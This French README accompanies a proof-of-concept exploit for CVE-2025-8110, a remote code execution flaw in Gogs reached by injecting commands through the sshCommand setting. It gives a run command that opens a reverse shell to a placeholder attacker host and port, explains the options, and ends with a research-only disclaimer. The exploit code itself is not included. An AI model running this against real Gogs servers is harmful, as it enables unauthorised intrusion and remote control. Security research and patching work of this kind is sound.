
PoC CVE-2025-8110
Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-8110, une vulnérabilité d'exécution de code à distance (RCE) dans Gogs. L'exploit cible l'implémentation du serveur SSH interne, permettant aux attaquants d'injecter des commandes malveillantes via la configuration sshCommand.
Pour exécuter l'exploit, utilisez le script CVE-2025-8110.py avec l'URL cible de Gogs et votre hôte/port d'écoute pour le shell inversé.
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: URL de base de l'instance Gogs cible (par ex., http://localhost:3000).-lh, --host: Adresse IP vers laquelle le shell inversé doit se connecter.-lp, --port: Port vers lequel le shell inversé doit se connecter.-x, --proxy: (Facultatif) Utilise un proxy local à http://localhost:8080 pour le débogage.Cette preuve de concept (PoC) est uniquement à des fins éducatives et de recherche. Elle est destinée à aider les chercheurs en sécurité et les administrateurs à comprendre et à atténuer la vulnérabilité CVE-2025-8110.
L'auteur décline toute responsabilité en cas d'utilisation non autorisée ou malveillante de ce code. Utilisez cet outil uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test. En utilisant ce code, vous acceptez d'assumer l'entière responsabilité de vos actions.